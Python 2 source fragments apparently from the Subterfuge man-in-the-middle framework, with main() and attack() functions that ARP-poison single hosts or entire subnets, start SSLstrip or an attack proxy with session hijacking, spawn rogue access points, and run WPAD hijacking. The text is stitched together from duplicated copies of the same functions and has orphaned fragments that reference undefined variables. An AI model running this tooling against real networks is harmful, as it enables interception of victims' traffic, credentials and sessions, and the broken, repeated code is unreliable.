def main():
#Checks for sane arguments
if len(sys.argv) < 2:
print "Invalid Arguments"
os.system("python /usr/share/subterfuge/utilities/notification.py 'ARP-MITM Error' 'Invalid Arguments were entered.'")
exit()
#Help menu
elif sys.argv[1] == "-h" or sys.argv[1] == "--help":
print "\nARPMITM courtesy of r00t0v3rr1d3 \n"
print "Usage: python arpmitm.py [OPTIONS] gateway\n"
print "HELP MENU:"
print " -s,--single [target ip] only poision a single host"
print " -r,--rearp Properly rearp network"
print " -h,--help display this message"
elif sys.argv[1] == "-r" or sys.argv[1] == "--rearp":
print 'Re-arping the network, removing man-in-the-middle...\n'
os.system("python /usr/share/subterfuge/utilities/notification.py 'Status' 'Re-arping the network, removing man-in-the-middle.'")
rearp(sys.argv[2])
elif sys.argv[1] == "-s" or sys.argv[1] == "--single":
print 'Poisoning a single host: ' + sys.argv[2] + '...\n'
try:
os.system("python /usr/share/subterfuge/utilities/notification.py 'Status' 'Poisoning a single host.'")
poisonsingle(sys.argv[2], sys.argv[3])
except:
notification_attackctrl("no-single-target")
print "Could not poison single target: no target found!"
elif len(sys.argv) < 3:
print "Poisoning the entire subnet...\n"
os.system("python /usr/share/subterfuge/utilities/notification.py 'Status' 'Poisoning the entire subnet.'")
poisonall(sys.argv[1])
def main():
#Checks for sane arguments
if len(sys.argv) < 2:
print "Invalid Arguments"
os.system("python /usr/share/subterfuge/utilities/notification.py 'ARP-MITM Error' 'Invalid Arguments were entered.'")
exit()
#Help menu
elif sys.argv[1] == "-h" or sys.argv[1] == "--help":
print "\nARPMITM courtesy of r00t0v3rr1d3 \n"
print "Usage: python arpmitm.py [OPTIONS] gateway\n"
print "HELP MENU:"
print " -s,--single [target ip] only poision a single host"
print " -r,--rearp Properly rearp network"
print " -h,--help display this message"
elif sys.argv[1] == "-r" or sys.argv[1] == "--rearp":
print 'Re-arping the network, removing man-in-the-middle...\n'
os.system("python /usr/share/subterfuge/utilities/notification.py 'Status' 'Re-arping the network, removing man-in-the-middle.'")
rearp(sys.argv[2])
elif sys.argv[1] == "-s" or sys.argv[1] == "--single":
print 'Poisoning a single host: ' + sys.argv[2] + '...\n'
try:
os.system("python /usr/share/subterfuge/utilities/notification.py 'Status' 'Poisoning a single host.'")
poisonsingle(sys.argv[2], sys.argv[3])
except:
notification_attackctrl("no-single-target")
print "Could not poison single target: no target found!"
elif len(sys.argv) < 3:
print "Poisoning the entire subnet...\n"
os.system("python /usr/share/subterfuge/utilities/notification.py 'Status' 'Poisoning the entire subnet.'")
poisonall(sys.argv[1])
def attack(method):
notification_attackctrl("init")
print "Starting Pwn Ops..."
#Determine Active Vectors
acp, apgenatk, wpad = getvectors()
target = ""
#Launch Attacks
#ARP Cache Poison
if acp == "yes":
#Auto Pwn Method
if (method == "auto"):
print "Running AutoPwn Method..."
#AutoConfig
autoconfig()
interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo(
)
#Begin Attack Setup
print "Automatically Configuring Subterfuge..."
iptablesconfig(proxymode)
print "Initiating ARP Poison With ARPMITM..."
#Get Poison Options
for info in arppoison.objects.all():
target = info.target
method = info.method
#Check for poison single/all
if (method == "single"):
try:
print "Poisoning: " + target
command = 'python ' + os.path.dirname(
os.path.abspath(__file__)
) + '/utilities/arpmitm.py -s ' + target + " " + gateway + ' &'
except:
notification_attackctrl("no-single-target")
print "Could not poison single target: no target found!"
else:
print "Poisoning: Network"
command = 'python ' + os.path.dirname(os.path.abspath(
__file__)) + '/utilities/arpmitm.py ' + gateway + ' &'
#ARP Cache Poison through Subterfuge:
os.system(command)
if proxymode == "sslstrip":
print "Starting up SSLstrip..."
sslstrip()
elif proxymode == "mitmproxy":
print "Starting up the MITM Attack Proxy..."
mitmproxy()
sessionhijack()
#Get & Log Router Mac
if (os.path.exists(
os.path.dirname(os.path.abspath(__file__)) +
"/arpmitm.txt")):
f = open(
os.path.dirname(os.path.abspath(__file__)) +
"/arpmitm.txt", 'r')
mac = f.readline()
macaddr = mac.rstrip("\n")
setup.objects.update(routermac=macaddr)
#os.system("python " + str(os.path.dirname(__file__)) + "/mitm.py -a &")
#Check for ARPWatch
if (smartarp == "yes"):
try:
os.system("python " + str(os.path.dirname(__file__)) +
"/utilities/arpwatch.py " + gateway + " " +
routermac + " " + attackerip + " &")
except:
notification_attackctrl("arpwatch-no-rmac")
print "Encountered an error configuring arpwatch: Router MAC Address Unknown."
#Standard Attack Method
else:
interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo(
)
#Begin Attack Setup
print "Automatically Configuring Subterfuge..."
iptablesconfig(proxymode)
print "Initiating ARP Poison With ARPMITM..."
#Get Poison Options
for info in arppoison.objects.all():
target = info.target
#Check for poison single/all
if (method == "single"):
command = 'python ' + os.path.dirname(
os.path.abspath(__file__)
) + '/utilities/arpmitm.py -s ' + target + " " + gateway + ' &'
else:
command = 'python ' + os.path.dirname(os.path.abspath(
__file__)) + '/utilities/arpmitm.py ' + gateway + ' &'
#ARP Cache Poison through Subterfuge:
os.system(command)
iptablesconfig(proxymode)
if proxymode == "sslstrip":
print "Starting up SSLstrip..."
sslstrip()
elif proxymode == "mitmproxy":
print "Starting up the MITM Attack Proxy..."
mitmproxy()
sessionhijack()
#Get & Log Router Mac
if (os.path.exists(
os.path.dirname(os.path.abspath(__file__)) +
"/arpmitm.txt")):
f = open(
os.path.dirname(os.path.abspath(__file__)) +
"/arpmitm.txt", 'r')
mac = f.readline()
macaddr = mac.rstrip("\n")
setup.objects.update(routermac=macaddr)
#Check for ARPWatch
if (smartarp == "yes"):
os.system("python " + str(os.path.dirname(__file__)) +
"/utilities/arpwatch.py " + gateway + " " +
routermac + " " + attackerip + " &")
else:
print "Dynamic ARP Retention is disabled."
#Wireless AP Generator
if apgenatk == "yes":
#Get Attack Info
for info in apgen.objects.all():
essid = info.essid
channel = info.channel
atknic = info.atknic
netnic = info.netnic
print "Launching Access Point Generation Attack..."
cmd = "xterm -e sh -c 'python " + str(
os.path.dirname(__file__)
) + "/utilities/apgen.py " + essid + " " + atknic + " " + netnic + "' &"
print cmd
os.system(cmd)
#Begin MITM Attack Setup
print "Automatically Configuring Subterfuge..."
iptablesconfig(proxymode)
print "Starting up SSLstrip..."
if proxymode == "sslstrip":
sslstrip()
elif proxymode == "mitmproxy":
print "Starting up the MITM Attack Proxy..."
mitmproxy()
sessionhijack()
#WPAD Hijacking
if wpad == "yes":
#Auto Pwn Method
print "Running AutoPwn Method..."
#AutoConfig
autoconfig()
interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo(
)
#Begin MITM Attack Setup
#Begin Attack Setup
#No IPTables SSLStrip Configuration necessary for WPAD Hijacking
#print "Automatically Configuring Subterfuge..."
#iptablesconfig(proxymode)
#Flush IPTables
print "Flushing IPTables for WPAD Hijacking"
os.system("iptables -t nat -F")
print "Starting up SSLstrip..."
sslstrip()
sessionhijack()
#Execute WPAD Hijacking
os.system("python " + str(os.path.dirname(__file__)) +
"/utilities/wpadhijack.py " + gateway + " " + routermac +
" " + attackerip + " &")
#Start Up Modules
modules()
temp = f.readline().rstrip('\n')
ipaddress = re.findall(r'\d*.\d*.\d*.\d*', temp)[0]
# Edit subterfuge.conf Deprecate for Version 5.0
print "Using: ", result[0]
print "Setting gateway as: ", autogate
conf[17] = autogate + "\n"
conf[15] = result[0] + "\n"
conf[26] = ipaddress + "\n"
#Set Database
setup.objects.update(gateway=autogate)
setup.objects.update(iface=result[0])
setup.objects.update(ip=ipaddress)
# Write to subterfuge.conf Deprecate for Version 5.0
with open(str(os.path.dirname(__file__)) + '/subterfuge.conf',
'w') as file:
file.writelines(conf)
#Check Arguments
if len(sys.argv) < 1:
notification_attackctrl("autoconfig-error")
print "Encountered an error configuring attack: Invalid Arguments. Terminating..."
exit()
else:
attack(sys.argv[1])
def attack(method):
notification_attackctrl("init")
print "Starting Pwn Ops..."
#Determine Active Vectors
acp, apgenatk, wpad = getvectors()
target = ""
#Launch Attacks
#ARP Cache Poison
if acp == "yes":
#Auto Pwn Method
if (method == "auto"):
print "Running AutoPwn Method..."
#AutoConfig
autoconfig()
interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo()
#Begin Attack Setup
print "Automatically Configuring Subterfuge..."
iptablesconfig(proxymode)
print "Initiating ARP Poison With ARPMITM..."
#Get Poison Options
for info in arppoison.objects.all():
target = info.target
method = info.method
#Check for poison single/all
if (method == "single"):
try:
print "Poisoning: " + target
command = 'python ' + os.path.dirname(os.path.abspath(__file__)) + '/utilities/arpmitm.py -s ' + target + " " + gateway + ' &'
except:
notification_attackctrl("no-single-target")
print "Could not poison single target: no target found!"
else:
print "Poisoning: Network"
command = 'python ' + os.path.dirname(os.path.abspath(__file__)) + '/utilities/arpmitm.py ' + gateway + ' &'
#ARP Cache Poison through Subterfuge:
os.system(command)
if proxymode == "sslstrip":
print "Starting up SSLstrip..."
sslstrip()
elif proxymode == "mitmproxy":
print "Starting up the MITM Attack Proxy..."
mitmproxy()
sessionhijack()
#Get & Log Router Mac
if (os.path.exists(os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt")):
f = open(os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt", 'r')
mac = f.readline()
macaddr = mac.rstrip("\n")
setup.objects.update(routermac = macaddr)
#os.system("python " + str(os.path.dirname(__file__)) + "/mitm.py -a &")
#Check for ARPWatch
if (smartarp == "yes"):
try:
os.system("python " + str(os.path.dirname(__file__)) + "/utilities/arpwatch.py " + gateway + " " + routermac + " " + attackerip + " &")
except:
notification_attackctrl("arpwatch-no-rmac")
print "Encountered an error configuring arpwatch: Router MAC Address Unknown."
#Standard Attack Method
else:
interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo()
#Begin Attack Setup
print "Automatically Configuring Subterfuge..."
iptablesconfig(proxymode)
print "Initiating ARP Poison With ARPMITM..."
#Get Poison Options
for info in arppoison.objects.all():
target = info.target
#Check for poison single/all
if (method == "single"):
command = 'python ' + os.path.dirname(os.path.abspath(__file__)) + '/utilities/arpmitm.py -s ' + target + " " + gateway + ' &'
else:
command = 'python ' + os.path.dirname(os.path.abspath(__file__)) + '/utilities/arpmitm.py ' + gateway + ' &'
#ARP Cache Poison through Subterfuge:
os.system(command)
iptablesconfig(proxymode)
if proxymode == "sslstrip":
print "Starting up SSLstrip..."
sslstrip()
elif proxymode == "mitmproxy":
print "Starting up the MITM Attack Proxy..."
mitmproxy()
sessionhijack()
#Get & Log Router Mac
if (os.path.exists(os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt")):
f = open(os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt", 'r')
mac = f.readline()
macaddr = mac.rstrip("\n")
setup.objects.update(routermac = macaddr)
#Check for ARPWatch
if (smartarp == "yes"):
os.system("python " + str(os.path.dirname(__file__)) + "/utilities/arpwatch.py " + gateway + " " + routermac + " " + attackerip + " &")
else:
print "Dynamic ARP Retention is disabled."
#Wireless AP Generator
if apgenatk == "yes":
#Get Attack Info
for info in apgen.objects.all():
essid = info.essid
channel = info.channel
atknic = info.atknic
netnic = info.netnic
print "Launching Access Point Generation Attack..."
cmd = "xterm -e sh -c 'python " + str(os.path.dirname(__file__)) + "/utilities/apgen.py " + essid + " " + atknic + " " + netnic + "' &"
print cmd
os.system(cmd)
#Begin MITM Attack Setup
print "Automatically Configuring Subterfuge..."
iptablesconfig(proxymode)
print "Starting up SSLstrip..."
if proxymode == "sslstrip":
sslstrip()
elif proxymode == "mitmproxy":
print "Starting up the MITM Attack Proxy..."
mitmproxy()
sessionhijack()
#WPAD Hijacking
if wpad == "yes":
#Auto Pwn Method
print "Running AutoPwn Method..."
#AutoConfig
autoconfig()
interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo()
#Begin MITM Attack Setup
#Begin Attack Setup
#No IPTables SSLStrip Configuration necessary for WPAD Hijacking
#print "Automatically Configuring Subterfuge..."
#iptablesconfig(proxymode)
#Flush IPTables
print "Flushing IPTables for WPAD Hijacking"
os.system("iptables -t nat -F")
print "Starting up SSLstrip..."
sslstrip()
sessionhijack()
#Execute WPAD Hijacking
os.system("python " + str(os.path.dirname(__file__)) + "/utilities/wpadhijack.py " + gateway + " " + routermac + " " + attackerip + " &")
#Start Up Modules
modules()
f = os.popen("ifconfig " + result[0] + " | grep \"inet addr\" | sed -e \'s/.*addr://;s/ .*//\'")
temp2 = ''
temp3 = ''
temp = f.readline().rstrip('\n')
ipaddress = re.findall(r'\d*.\d*.\d*.\d*', temp)[0]
# Edit subterfuge.conf Deprecate for Version 5.0
print "Using: ", result[0]
print "Setting gateway as: ", autogate
conf[17] = autogate + "\n"
conf[15] = result[0] + "\n"
conf[26] = ipaddress + "\n"
#Set Database
setup.objects.update(gateway = autogate)
setup.objects.update(iface = result[0])
setup.objects.update(ip = ipaddress)
# Write to subterfuge.conf Deprecate for Version 5.0
with open(str(os.path.dirname(__file__)) + '/subterfuge.conf', 'w') as file:
file.writelines(conf)
#Check Arguments
if len(sys.argv) < 1:
notification_attackctrl("autoconfig-error")
print "Encountered an error configuring attack: Invalid Arguments. Terminating..."
exit()
else:
attack(sys.argv[1])
